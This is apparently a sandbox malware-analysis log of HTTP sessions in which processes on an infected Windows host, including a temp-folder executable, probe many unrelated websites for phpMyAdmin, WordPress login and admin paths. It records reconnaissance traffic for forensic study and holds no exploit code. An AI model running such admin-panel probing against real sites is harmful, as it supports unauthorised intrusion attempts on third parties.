                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
534 | 192.168.2.6 | 65021 | 41.33.126.100 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:11.734694958 CET | 180 | OUT | GET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: student.emis.gov.eg
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:11.992058992 CET | 143 | IN | HTTP/1.0 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Location: https://student.emis.gov.eg/PhpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Server: BigIP
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
535 | 192.168.2.6 | 64750 | 103.90.225.70 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:11.735351086 CET | 175 | OUT | GET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ngoalongvn.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:12.088222980 CET | 1286 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/8.5
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:14 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1245
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.088239908 CET119INData Raw: 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 68 33 3e 0d 0a 20 3c 2f 66 69 65 6c 64 73
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
536 | 192.168.2.6 | 49571 | 185.51.191.48 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:12.231431007 CET | 181 | OUT | GET /admin/w HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: innovationdevelopment.eu
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:12.524139881 CET | 1286 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=ba0ae7db91a15a20c859a36e9617e7c7; expires=Tue, 06-Feb-2024 11:16:11 GMT; Max-Age=86400; path=/
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: VISITORID=6f23480ee7ffaf87556eb25c893227a7; expires=Tue, 06-Feb-2024 11:16:11 GMT; Max-Age=86400
                                                                                                                                                                                                                                                                                                                                                                Upgrade: h2,h2c
                                                                                                                                                                                                                                                                                                                                                                Connection: Upgrade, close
                                                                                                                                                                                                                                                                                                                                                                Location: http://innovationdevelopment.eu/admin/w/login
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 1d57<!DOCTYPE html><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><title>Innome</title><link rel="stylesheet" href="/css/system.css?v=1.808" /><link rel="stylesheet" href="/css/flags.css?v=1.808" /><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="black" /><meta name="MobileOptimized" content="width" /><meta name="HandheldFriendly" content="true" /><meta http-equiv="cleartype" content="on" /><meta name="twitter:card" content="summary_large_image"><meta http-equiv="Content-Type" content="text/ht
Feb 5, 2024 12:16:12.524158955 CET  1286  IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ml; charset=UTF-8" /><link rel="stylesheet" href="http://innovationdevelopment.eu/admin/admin.css?v=1707131771" /><link rel="stylesheet" href="http://innovationdevelopment.eu/admin/_custom_admin.css?v=1707131771" />...<link rel="s
Feb 5, 2024 12:16:12.524262905 CET  1286  IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: draggable.min.js"></script><script type="text/javascript" src="/js/jquery/ui/jquery.ui.button.min.js"></script><script type="text/javascript" src="/js/jquery/ui/jquery.ui.dialog.min.js"></script><script type="text/javascript" src="/js
Feb 5, 2024 12:16:12.524281025 CET  1286  IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: keditor.js"></script><script type="text/javascript" src="/js/ckfinder___3/ckfinder.js"></script><link rel="stylesheet" href="/js/jquery/timepicker/jquery-clockpicker.min.css"><script type="text/javascript" src="/js/jquery/timepicker/j
Feb 5, 2024 12:16:12.524297953 CET  1286  IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: area.ckeditor').each(function(){var ckid=$(this).attr('id');if(ckid=='' || typeof ckid==='undefined'){ckid="ck"+Math.random().toString(36).substring(7);$(this).attr('id',ckid);}var editor = CKEDITOR.replace( cki
Feb 5, 2024 12:16:12.524316072 CET  1286  IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: /a><div id="admin_sidetitle"></div><div id="admin_sidetitle_right"><select name="admin_language" class="admin_language" onChange="document.location.href='/admin/w/language/'+this.value;"><option value="hu" >Magyar</option><option
Feb 5, 2024 12:16:12.524331093 CET  386  IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: t;});</script></div></div><div class="clear"></div><div id="footer"><footer><div id="help_footer"></div><br><br><br><br><br><br><br><br><br></footer></div><div class="clear"></div></div></div><div class="
Feb 5, 2024 12:16:12.530353069 CET  5  IN  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port
537         192.168.2.6  49692        172.203.148.34  80

Timestamp  Bytes transferred  Direction  Data
Feb 5, 2024 12:16:12.379749060 CET  180  OUT  GET /PhpMyAdmin/ HTTP/1.1
Host: eei.uniandes.edu.co
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:12.494517088 CET  155  IN  HTTP/1.1 302 Found : Moved Temporarily
Location: https://eei.uniandes.edu.co/PhpMyAdmin/
Connection: close
Cache-Control: no-cache
Pragma: no-cache


Session ID  Source IP    Source Port  Destination IP  Destination Port
538         192.168.2.6  49735        64.91.249.20    80

Timestamp  Bytes transferred  Direction  Data
Feb 5, 2024 12:16:12.430047989 CET  167  OUT  GET /admin HTTP/1.1
Host: chainmine.io
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:12.912926912 CET  351  IN  HTTP/1.1 302 Moved Temporarily
Date: Mon, 05 Feb 2024 11:16:12 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9
X-Powered-By: PHP/5.4.16
Connection: close
Cache-Control: no-cache
Pragma: no-cache
Location: http://ww12.chainmine.io/admin?usid=27&utid=4923818255
Content-Length: 0
Content-Type: text/html; charset=UTF-8


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
539         192.168.2.6  49716        103.224.182.210  80                4004  C:\Windows\explorer.exe

Timestamp  Bytes transferred  Direction  Data
Feb 5, 2024 12:16:12.433847904 CET  174  OUT  GET /admin HTTP/1.1
Host: followerstiktok.xyz
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:12.601926088 CET  342  IN  HTTP/1.1 302 Found
date: Mon, 05 Feb 2024 11:16:12 GMT
server: Apache
set-cookie: __tad=1707131772.2346661; expires=Thu, 02-Feb-2034 11:16:12 GMT; Max-Age=315360000
location: http://ww16.followerstiktok.xyz/admin?sub1=20240205-2216-12ca-876d-f5344b7b6169
content-length: 2
content-type: text/html; charset=UTF-8
connection: close
Data Raw: 0a 0a
Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port
540 | 192.168.2.6 | 49688 | 178.16.128.181 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:12.459465027 CET | 173 | OUT | GET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: mobilsam.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:12.653604031 CET | 1016 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                                                                                                                                content-type: text/html
                                                                                                                                                                                                                                                                                                                                                                content-length: 707
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                server: LiteSpeed
                                                                                                                                                                                                                                                                                                                                                                location: https://mobilsam.com/PhpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                platform: hostinger
                                                                                                                                                                                                                                                                                                                                                                content-security-policy: upgrade-insecure-requests
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
541 | 192.168.2.6 | 49717 | 185.120.71.26 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:12.494699955 CET | 178 | OUT | GET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: www.analvids.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:12.703715086 CET | 383 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 178
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://www.analvids.com/wp-login.php
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
542 | 192.168.2.6 | 49752 | 195.248.251.103 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:12.528753042 CET | 176 | OUT | GET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: phonandroid.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:12.742680073 CET | 223 | IN | HTTP/1.1 301 Permanently moved
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Varnish
                                                                                                                                                                                                                                                                                                                                                                X-Varnish: 13616688
                                                                                                                                                                                                                                                                                                                                                                X-Redirected-By: lxc-varnish-ressources-01
                                                                                                                                                                                                                                                                                                                                                                Location: https://www.phonandroid.com/phpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
543 | 192.168.2.6 | 49810 | 3.141.96.53 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:12.528887033 CET | 217 | OUT | GET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: money-farm.cc
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Referer: https://money-farm.cc/wp-login.php
Feb 5, 2024 12:16:12.651449919 CET | 147 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                location: https://money-farm.cc/wp-admin/
                                                                                                                                                                                                                                                                                                                                                                transfer-encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
544 | 192.168.2.6 | 49881 | 34.149.46.130 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:12.528994083 CET | 176 | OUT | GET /admin HTTP/1.1
Host: accounts.snapchat.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:12.631637096 CET | 205 | IN | HTTP/1.1 301 Moved Permanently
Cache-Control: private
Location: https://accounts.snapchat.com:443/admin
Content-Length: 0
Date: Mon, 05 Feb 2024 11:16:12 GMT
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
545 | 192.168.2.6 | 49754 | 82.221.28.171 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:12.545109987 CET | 166 | OUT | GET /PhpMyAdmin/ HTTP/1.1
Host: uh.is
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:12.779031992 CET | 529 | IN | HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Mon, 05 Feb 2024 11:16:12 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
Keep-Alive: timeout=60
Location: https://uh.is/PhpMyAdmin/
X-Robots-Tag: noindex, nofollow, nosnippet, noarchive
x-frame-options: SAMEORIGIN
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
546 | 192.168.2.6 | 49889 | 195.85.23.95 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:12.552294970 CET | 172 | OUT | GET /admin/ HTTP/1.1
Host: ro.bongacams.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:12.775516033 CET | 756 | IN | HTTP/1.1 301 Moved Permanently
Date: Mon, 05 Feb 2024 11:16:12 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
location: https://ro.bongacams.com/admin
x-bc: ded7160
x-zone: 3-reserve101-ded7160
CF-Cache-Status: DYNAMIC
Set-Cookie: __cf_bm=NZswYeQ9Yu7K9JcgvzK4LmoL_0TST4ve7RnZaydD5ic-1707131772-1-Ab4rNABlIeBJEAeRFX16kvHDLRPbDvXG6xV0NJ9evJ6Oi/BiIUIPdZoJZ/mYFBfKpixlKrbGtITCrQfyx9t7OTw=; path=/; expires=Mon, 05-Feb-24 11:46:12 GMT; domain=.bongacams.com; HttpOnly; SameSite=None
Server: cloudflare
CF-RAY: 850abd6acfb353cf-ATL
alt-svc: h3=":443"; ma=86400
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
547 | 192.168.2.6 | 49891 | 142.250.105.84 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:12.558478117 CET | 173 | OUT | GET /pma/ HTTP/1.1
Host: accounts.google.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:12.691452980 CET | 478 | IN | HTTP/1.1 302 Moved Temporarily
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 05 Feb 2024 11:16:12 GMT
Location: https://accounts.google.com/pma/
Content-Encoding: gzip
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: frame-ancestors 'self'
X-XSS-Protection: 1; mode=block
Content-Length: 178
Server: GSE
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.691468954 CET178INData Raw: 1f 8b 08 00 00 00 00 00 00 ff 6d 8f c1 0a 83 30 10 44 ef 7e 45 48 ef a6 bd 96 18 d0 1a 6b 41 11 24 87 f6 18 e2 62 0a c6 48 8c 85 fe 7d 63 da 63 e7 b2 ec ec 30 bc a5 b5 68 1b 96 d0 9a e7 65 18 e2 26 1a ce 5a fb 82 01 09 30 8b 75 d2 3d a7 37 25 df


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
548 | 192.168.2.6 | 49784 | 201.134.41.61 | 80 | 4004 | C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:12.561821938 CET | 180 | OUT | GET /PhpMyAdmin/ HTTP/1.1
Host: academico.um.edu.mx
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:12.723751068 CET | 572 | IN | HTTP/1.1 301 Moved Permanently
Date: Mon, 05 Feb 2024 11:16:12 GMT
Server: Apache/2.4.29 (Ubuntu)
Location: https://academico.um.edu.mx/academico/PhpMyAdmin/
Content-Length: 342
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://academico.um.edu.mx/academico/PhpMyAdmin/">here</a>.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at academico.um.edu.mx Port 80</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
549 | 192.168.2.6 | 49890 | 138.197.59.199 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe

Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:12.577724934 CET | 177 | OUT | GET /pma/ HTTP/1.1
Host: api.cmrsanmartin.ziz.cl
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:12.699147940 CET | 550 | IN | HTTP/1.1 301 Moved Permanently
Date: Mon, 05 Feb 2024 11:16:12 GMT
Server: Apache/2.4.41 (Ubuntu)
Location: https://api.cmrsanmartin.ziz.cl/pma/
Content-Length: 333
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://api.cmrsanmartin.ziz.cl/pma/">here</a>.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at api.cmrsanmartin.ziz.cl Port 80</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
550 | 192.168.2.6 | 49811 | 54.183.63.241 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe

Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:12.580295086 CET | 174 | OUT | GET /admin/ HTTP/1.1
Host: pt.secure.imvu.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:12.761522055 CET | 759 | IN | HTTP/1.1 404 Not Found
Date: Mon, 05 Feb 2024 11:16:12 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Server: nginx/1.17.9
X-Powered-By: PHP/8.2.4
Set-Cookie: osCsid=3cfcf3297704242d99b2d5fe10204f22; expires=Mon, 04 Mar 2024 11:16:12 GMT; Max-Age=2419200; path=/; domain=.imvu.com; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: osCsid=3cfcf3297704242d99b2d5fe10204f22; expires=Mon, 04 Mar 2024 11:16:12 GMT; Max-Age=2419200; path=/; domain=.imvu.com; secure; HttpOnly; SameSite=None
x-imvu-rnd: G4Ews4zi5F5r5dXKCGns
Content-Encoding: gzip
Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a
Data Ascii: 14
Feb 5, 2024 12:16:12.761569023 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
551 | 192.168.2.6 | 49906 | 13.249.120.4 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe

Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:12.582818031 CET | 165 | OUT | GET /admin HTTP/1.1
Host: tiktok.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:12.684576035 CET | 565 | IN | HTTP/1.1 301 Moved Permanently
Server: CloudFront
Date: Mon, 05 Feb 2024 11:16:12 GMT
Content-Type: text/html
Content-Length: 167
Connection: keep-alive
Location: https://tiktok.com/admin
X-Cache: Redirect from cloudfront
                                                                                                                                                                                                                                                                                                                                                                Via: 1.1 d2c82a47dca9b567464b4d0c63ebebc8.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: ATL51-C1
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: DysLBB5ey-HXTd_EC2Zb0BuOsIq73GVXTD_vJEX-paSsXYJV8spp2Q==
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>CloudFront</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
552 | 192.168.2.6 | 49909 | 3.161.150.69 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:12.585573912 CET | 178 | OUT | GET /admin.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: account.booking.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:12.688502073 CET | 578 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Server: CloudFront
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 167
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://account.booking.com/admin.php
                                                                                                                                                                                                                                                                                                                                                                X-Cache: Redirect from cloudfront
                                                                                                                                                                                                                                                                                                                                                                Via: 1.1 3e445414cb8134bf4b609fdcfe022fcc.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: ATL59-P5
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: Kpi2UXU9lZl222oThyEyBGv7OH6dtuAn_0ZqYsgzB16VdkBi2bATcQ==
